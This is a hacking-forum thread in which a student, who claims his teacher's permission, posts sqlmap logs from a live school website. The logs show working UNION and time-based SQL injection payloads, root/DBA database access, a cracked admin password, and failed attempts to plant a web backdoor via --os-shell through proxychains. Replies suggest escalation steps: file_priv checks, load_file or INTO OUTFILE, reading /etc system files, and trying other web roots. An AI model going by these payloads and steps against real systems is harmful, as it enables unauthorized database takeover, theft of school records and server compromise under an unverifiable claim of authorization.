mysql db of my school

[s0uthboy]

Hello there
my school website got a mysql db, i've found multiple vulnerabilities in it with mysql.
i've asked our teacher(the webmaster) if i could practice some security test.


i've found multiple vulnerabilities in the database, i've also cracked the admin password, but i've got a doubt that i will explain at your much experienced eyes, so im front of this scenario:

Code: [Select]

[*] starting at 13:06:17


[13:06:18] [INFO] resuming back-end DBMS 'mysql'
[13:06:18] [INFO] testing connection to the target URL
|S-chain|-<>-127.0.0.1:9050-<><>-*.*.*.*:80-<><>-OK
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: id=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a786b793a,0x696e4f6a646e68504971,0x3a71666d3a),NULL#


    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: id=' AND 3502=BENCHMARK(5000000,MD5(0x48537954)) AND 'dqVz'='dqVz
---
[13:06:21] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5
[13:06:21] [INFO] fetching current user
current user:    'root@localhost'
[13:06:21] [INFO] testing if current user is DBA
[13:06:21] [INFO] fetching current user
current user is DBA:    True
[13:06:21] [INFO] fetched data logged to text files under '/opt/backbox/sqlmap/output/


[*] shutting down at 13:06:21


so the user is root and ofc, i have DBA permissions but when i try to switch --os-shell i got this:

Code: [Select]




s0uthboy@GLaDOS2:~$ sudo proxychains /opt/backbox/sqlmap/sqlmap.py -u "http://www.schoolsite.it/index2.php?id=" --os-shell
ProxyChains-3.1 (http://proxychains.sf.net)


    sqlmap/1.0-dev-7ba9e75 - automatic SQL injection and database takeover tool
    http://sqlmap.org


[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program


[*] starting at 13:10:15


[13:10:16] [INFO] resuming back-end DBMS 'mysql'
[13:10:16] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: id=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a786b793a,0x696e4f6a646e68504971,0x3a71666d3a),NULL#


    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: id=' AND 3502=BENCHMARK(5000000,MD5(0x48537954)) AND 'dqVz'='dqVz
---
[13:10:19] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5
[13:10:19] [INFO] going to use a web backdoor for command prompt
[13:10:19] [INFO] fingerprinting the back-end DBMS operating system
[13:10:19] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
[13:10:21] [WARNING] unable to retrieve automatically the web server document root
what do you want to use for web server document root?
[1] common location(s) '/var/www/' (default)
[2] custom location
[3] custom directory list file
[4] brute force search


> 2
please provide the web server document root: /var/www/school/docs/
[13:12:24] [WARNING] unable to retrieve automatically any web server path
[13:12:24] [INFO] trying to upload the file stager on '/var/www/school/docs' via LIMIT INTO OUTFILE technique
[13:12:25] [WARNING] reflective value(s) found and filtering out
[13:12:26] [WARNING] unable to upload the file stager on '/var/www/school/docs'
[13:12:26] [INFO] trying to upload the file stager on '/var/www/school/docs' via UNION technique
[13:12:27] [WARNING] expect junk characters inside the file as a leftover from UNION query
[13:12:29] [WARNING] it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path
[13:12:30] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 2 times
[13:12:30] [INFO] fetched data logged to text files under


[*] shutting down at 13:12:30



same errors with --os-cmd and --os-pwn, i've also made some tests using --sql-shell into outfile technique, but nothing.
 
thats it, i need to know if there is another way to upload something, without using the admin panel on the website, or if there is another way to get into the server.


Thanks for your attention

[robber]

ceck if user has file_priv ,then load_file or into_outfile. Maybe file_priv = 0/OFF or find a writeble direktory, ceck /etc/hosts and /etc/named.conf too if yu can

[Z3R0]

404 (Not Found) - 2 TIMES

The directory you're trying to have sqlmap upload the shell to doesn't exist. Try a different directory when it prompts you for the web root.

[s0uthboy]

The directory you're trying to have sqlmap upload the shell to doesn't exist. Try a different directory when it prompts you for the web root.

that's the weird part, im sure that the directory exist, i've asked at our teacher, and also if i do --file-read /var/www/school/docs/index.php sqlmap successfully dump the index page...


if i try to browse that directory via browser,displays access denied, so i've tried some dirs that can be explored /var/www/school/icons/ & /var/www/school/images/... i got all privileges as   --roles says.. so im pretty much confused  


i think that the mysql privileges are limitated on the machine, i mean that i can be root on the DBMS without having sudo privileges in the remote machine.


its time to do my homework, and find a rfi/lfi bug , 2much automated exploitation is not the way

 

[Z3R0]

2much automated exploitation is not the way

+1 I'm glad you're seeking alternate means. Good luck, and let us know how it goes!